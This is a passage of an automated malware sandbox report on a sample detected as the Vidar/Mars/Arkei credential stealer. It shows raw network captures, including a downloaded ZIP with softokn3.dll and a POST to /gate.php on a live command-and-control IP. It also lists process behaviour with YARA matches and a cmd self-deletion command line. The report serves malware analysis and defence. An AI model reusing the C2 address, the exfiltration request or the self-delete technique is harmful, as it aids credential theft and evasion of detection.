b1 29 4d 0f 36 ad 61 18 62 6b a1 82 b3 19 70 a5 53 9a d6 35 6c 5c c3 60 db 91 0f 30 47 bb 01 37 8f f9 ff 3f ff a7 3f cb c4 ee fd 2b 27 5a b8 70 4c 18 29 cd cc 62 98 70 2c 68 73 c5 6a 3a f0 68 8d bc ef 65 56 07 1a 25 8d 24 a0 94 50 97 9c 40 b5 eb 51 99 52 f7 28 84 12 1c 2a 00 a5 59 4d 87 4e d0 89 51 26 82 da 58 8a d3 f3 a3 0c 9c ea 9b 75 72 b6 99 c9 69 65 28 42 2b 08 a1 34 55 46 0b c5 66 96 99 94 ad 20 25 21 22 87 88 18 8e 47 e4 7d 05 40 b5 23 41 f4 9b 91 84 28 08 e8 50 10 3b 2c 14 89 0f 46 ea bd b2 d3 82 bc 12 9a 84 7e 32 fe 77 cf b1 9c 9c 5d 02 ff ad 16 33 aa d0 9c 13 41 07 c0 ed 4b e4 ec 95 68 34 34 09 8d 32 5e df 9b 31 f8 f9 56 3d fc 38 78 f0 60 5d 6d 87 ce 63 9b 46 1a a3 b8 d2 42 45 71 e1 48 13 73 fd 34 df 5b 28 be f5 16 43 14 ad 66 82 d6 d2 82 3e 19 a1 17 e4 b6 1a 04 bd 31 c2 44 50 85 95 e2 bd cb 0c 55 45 a3 36 98 a1 96 5a a9 d4 aa 18 61 4c 2d bf 4e ce 2d 26 72 ea 83 3a cb ac 23 f4 79 d5 40 99 f5 19 67 22 a2 51 07 89 99 41 26 eb 20 3f 37 83 14 e8 20 0f 9b 41 38 1d c4 67 02 d9 77 88 4e 8d a9 66 82 b2 74 90 4c 33 48 8e 0e 12 77 9a e8 ba 40 17 93 77 cc 50 17 69 d4 b3 66 a8 4b 34 ea ef cd 50 a5 74 6a 78 cc 50 25 34 ea 76 33 d4 4a 1a 35 cc 0c d5 45 f3 fa 34 d3 04 75 86 ae 73 bf c9 34 ae da 02 7a 19 3d 9d a9 5f 46 d3 8d eb f1 41 33 6d 03 16 4a 5b a5 89 b6 c9 b4 b6 02 4a 5b 99 51 5b 8a 99 b6 52 5a d0 1f 32 f4 82 8a 8c 82 da 33 4c 04 b5 d1 a9 f9 b4 19 ea 08 8d 6a 34 43 1d a6 51 f7 98 a1 5e a6 a9 e7 53 d4 63 0c 45 3d 53 62 29 48 bb 11 f2 7b 87 1e d2 45 43 20 fe 0e 63 44 de 4d da 7e 46 48 7b 08 c2 ea 8a a9 fb 4b 1b bd c9 6d a6 f4 1c 33 52 f1 50 90 dd 46 48 21 05 d9 65 84 64 50 90 7d 46 83 3e 1f 6e 34 e8 00 43 af ff e1 26 41 d8 a1 33 fb b9 e1 b4 d9 3b 69 b3 1f 1d ae 67 b3 d7 48 78 25 05 69 b0 18 20 c5 14
                                                                                        Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkMHWD<{.6.Xtw+E][Oax}{'n.&m70eflp50p5{t'Ieoe_[q)1L%g0mZfkos,q(>`dV3`?%9oV0Sb2rh`aHocahEeq)M6abkpS5l\`0G7??+'ZpL)bp,hsj:heV%$P@QR(*YMNQ&Xurie(B+4UFf %!"G}@#A(P;,F~2w]3AKh442^1V=8x`]mcFBEqHs4[(Cf>1DPUE6ZaL-N-&r:#y@g"QA& ?7 A8gwNftL3Hw@wPifK4PtjxP%4v3J5E4us4z=_FA3mJ[J[Q[RZ23Lj4CQ^ScE=Sb)H{EC cDM~FH{Km3RPFH!edP}F>n4C&A3;igHx%i
                                                                                        Dec 16, 2023 18:16:56.209005117 CET1286INData Raw: a4 d1 98 a5 a3 cd e8 66 d1 0b be 27 dd 04 95 43 a3 4e 9a a1 7a e9 2c 3d 60 86 ca a5 8b c7 23 e9 06 5f d7 57 e8 e4 ac 34 91 53 bf 54 6f 7f ba 7e 27 5b 48 19 3f c6 4c 84 5b c7 a3 2f cd c8 a3 48 27 e4 42 9a 89 90 32 1d 8f 5f a7 e9 79 94 50 3c 9e 34
                                                                                        Data Ascii: f'CNz,=`#_W4STo~'[H?L[/H'B2_yP<4Ql0s)-H3lli4iC=43%v:MPPi3f(;d*QP5OafIJ>4CeWPy4*jQ88w1im:9ffK3Tze[j,-43Qpt
                                                                                        Dec 16, 2023 18:16:56.209017992 CET1286INData Raw: 52 0a 56 0c 79 e2 3a 81 17 94 3b 60 57 79 2d 50 79 39 70 3e df 91 cc 6c 3b 95 57 0e b1 92 f3 88 35 39 40 30 1f 25 95 3b 1a 6e 01 47 44 a2 cd 10 28 c4 f4 ba 05 31 2d 80 1c f7 f9 2f 2a 4c 47 5b 95 31 60 7f 45 19 b3 28 ec 01 e8 46 cf b0 18 2f 2a 1a
                                                                                        Data Ascii: RVy:;`Wy-Py9p>l;W59@0%;nGD(1-/*LG[1`E(F/*D>sZPfSlN?%BXb$1/PFWF&C@w2Q0,MK{cjJy,QTIdRD?WMoDY@3bqVVNxp>!
                                                                                        Dec 16, 2023 18:16:56.209031105 CET1286INData Raw: cc e0 29 03 67 26 42 bd ca ab 1c 5b 11 ad 8f 7e 40 3c cf 41 b5 b3 6f bb 81 4e 65 42 7a 67 4a 8b 52 5d 92 37 05 07 f1 36 2a 7a 31 93 ec 55 12 43 aa db 36 68 5e 78 a5 57 52 95 7c 18 89 94 3f 54 04 1a 26 b5 60 76 3d d5 66 91 ed 19 24 b2 c8 41 7d 5b
                                                                                        Data Ascii: )g&B[~@<AoNeBzgJR]76*z1UC6h^xWR|?T&`v=f$A}[5ECt)%msN6damh-4E_Dn|s:e~h%I/YG**9^qUrjLb=OQ'[C[,Ae&D0X`n2(
                                                                                        Dec 16, 2023 18:16:56.209084034 CET1286INData Raw: 2c fb ca a6 7c 53 99 fe 15 2a 42 4e 3b ab 2c 4a 7b f9 2c 81 6b fa bd 2b a6 6c 7c f4 4d 80 f0 84 90 a1 c8 e1 7c 68 50 f3 a1 59 c9 07 fe 08 4a 06 fe 10 ba 06 a1 54 e0 77 7a 95 44 e0 5b 7d 38 0d 22 42 0c a2 4d 82 7e 61 1a 6e 2e 91 84 b8 42 52 a0 9b
                                                                                        Data Ascii: ,|S*BN;,J{,k+l|M|hPYJTwzD[}8"BM~an.BRw E?bzwAg?b4&K)]X(e(*2k2ot>z| U)L~82d8?e\-WVo]'&:O~`}#5C
                                                                                        Dec 16, 2023 18:16:56.209142923 CET1286INData Raw: 54 8e d0 e3 57 09 b6 d0 e8 59 82 0d c0 a6 01 06 f8 99 1d 81 0c e3 2a 4d 56 f9 9e 11 d5 f3 b7 19 f4 a5 89 53 70 b3 22 5a 26 b7 9b 6b 63 73 0c 77 e6 79 c8 8c ea ab 58 ad c1 b8 cb cb 94 1b 75 33 aa 8f 02 64 46 75 1b 14 25 35 a1 69 bc 97 dd 0c 2f 24
                                                                                        Data Ascii: TWY*MVSp"Z&kcswyXu3dFu%5i/$f1q`!SyOg7rK]3~H'L_9A)4KnXgF_V1*A*"ut!&b@,V7@@~4TMo3R5e5-)h
                                                                                        Dec 16, 2023 18:16:56.209212065 CET1286INData Raw: 45 63 77 af b5 e6 ed 06 b5 75 11 64 ef 5f aa 53 ad 6b 34 62 d6 e5 8d 37 a0 74 82 34 24 ee c1 2d 9c 4c 1a 66 c2 54 ea ab 3f c0 b6 a6 8a 5d 18 76 b0 5b 96 ea 9c 46 81 df 17 16 d8 e3 4b b5 91 44 68 c2 7e b9 94 a6 e0 60 b3 b2 63 71 c6 ee 1e ed d2 f6
                                                                                        Data Ascii: Ecwud_Sk4b7t4$-LfT?]v[FKDh~`cqolhRs\US[[`l[wBx=ix|DtpF=UaDjQyT0($ cp$XSkSEl*t-
                                                                                        Dec 16, 2023 18:16:56.209275007 CET1286INData Raw: c1 de 08 14 c3 e7 27 ea ad 38 9c c7 e4 a6 01 f6 d2 42 84 4f 3f 31 2c e8 de a5 b8 1d ce fd 75 c6 1d c7 8f 06 62 e5 4d 57 d0 3a 3a 2c fd ab 4b 6e 3f 12 b3 5c d1 00 4b 89 3d bf 10 6d b7 0f 5b 9f 7f 47 76 1f 32 f6 c8 ee bd 0d b4 40 e9 7b 2f f2 95 4d
                                                                                        Data Ascii: '8BO?1,ubMW::,Kn?\K=m[Gv2@{/Mxy\i|5aea$~LNOn:85Yo7!G9R1{)*s-P[,=0\\<mXYkF.fkn
                                                                                        Dec 16, 2023 18:16:56.209306002 CET1286INData Raw: 8b 8e 3e 25 2d 39 97 64 d0 b4 18 df 23 74 7d 6a 48 79 0b 08 e9 d3 b6 eb cf 4e 7b 0b 34 70 ff 03 c7 79 c8 89 0c 92 1a 33 37 6c 6c 4c b4 a2 09 86 de 05 68 3c b6 a6 f2 e8 53 40 8a 5f 78 15 71 e2 64 f0 e8 53 ce 3d ae ba 02 e8 38 40 dc 24 cf 5a b2 d2
                                                                                        Data Ascii: >%-9d#t}jHyN{4py37llLh<S@_xqdS=8@$Z,$/m~vJ1$~oW`j{LBZ>jh5JwcDA"^yvzNQb`|#'l~)5^uaeeW9)I)3/XRn9<v
                                                                                        Dec 16, 2023 18:16:56.209403992 CET1286INData Raw: c1 92 ca 0f b0 ba 8f 20 a7 12 c5 a9 e4 2b e9 05 cc ac ec 48 2d 9f 96 7a be 7c d8 2f e6 70 b4 92 fa 2c 7e be b7 c9 e7 e8 e6 4e 9c 0c 8d e0 5a d5 80 b4 db e4 a5 7d dc 4e a7 d7 07 85 d4 21 a2 39 9c d3 18 ff 9c b4 2f d3 00 fb 8f b9 2d 39 b0 e3 5e 5f
                                                                                        Data Ascii: +H-z|/p,~NZ}N!9/-9^_]>Q-#~3?6@P4/:Cat17Wy;ix=7AeNw&Hc\H+/gv_^lf=nI(&]o|^&x7g}PBy8dl<)>6|
                                                                                        Dec 16, 2023 18:16:56.454298019 CET1286INData Raw: cf 05 b8 8d 44 6a b4 6a 30 32 4a 2a 53 23 23 54 a7 1f 30 99 15 ce e3 87 9f c3 54 40 59 e9 4b 83 b8 4b 69 1f 50 9a fa 01 74 01 f6 d8 7b 08 e9 51 02 9d 5d 1e 8b e4 fb 59 be c0 45 f4 f8 c7 74 74 c6 06 3f 80 1f a5 97 b5 be 47 a0 23 cc a2 8e 6f 25 3d
                                                                                        Data Ascii: Djj02J*S##T0T@YKKiPt{Q]YEtt?G#o%=jH<2%zLh">6v,7H&aK08UmN>;?#M3@]PYI1RU gcn4C1ksS.:i@vn
                                                                                        Dec 16, 2023 18:16:59.166794062 CET231OUTPOST /gate.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790
                                                                                        Host: 91.92.250.149
                                                                                        Content-Length: 2882
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                                                                                        Dec 16, 2023 18:16:59.473079920 CET375INHTTP/1.1 200 OK
                                                                                        Date: Sat, 16 Dec 2023 17:16:59 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.45
                                                                                        X-Powered-By: PHP/5.4.45
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Pragma: no-cache
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=98
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:18:16:53
                                                                                        Start date:16/12/2023
                                                                                        Path:C:\Users\user\Desktop\4bVsmYiuXy.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\Desktop\4bVsmYiuXy.exe
                                                                                        Imagebase:0xce0000
                                                                                        File size:2'755'584 bytes
                                                                                        MD5 hash:BFFA608E609A6E2F67D01BB5F64BA70A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_ArkeiStealer_84c7086a, Description: unknown, Source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1632581206.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_ArkeiStealer_84c7086a, Description: unknown, Source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1632581206.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:18:16:54
                                                                                        Start date:16/12/2023
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe
                                                                                        Imagebase:0x900000
                                                                                        File size:43'008 bytes
                                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.1678526182.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_ArkeiStealer_84c7086a, Description: unknown, Source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:18:16:59
                                                                                        Start date:16/12/2023
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe" & exit
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:18:16:59
                                                                                        Start date:16/12/2023
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:18:16:59
                                                                                        Start date:16/12/2023
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 5
                                                                                        Imagebase:0x760000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >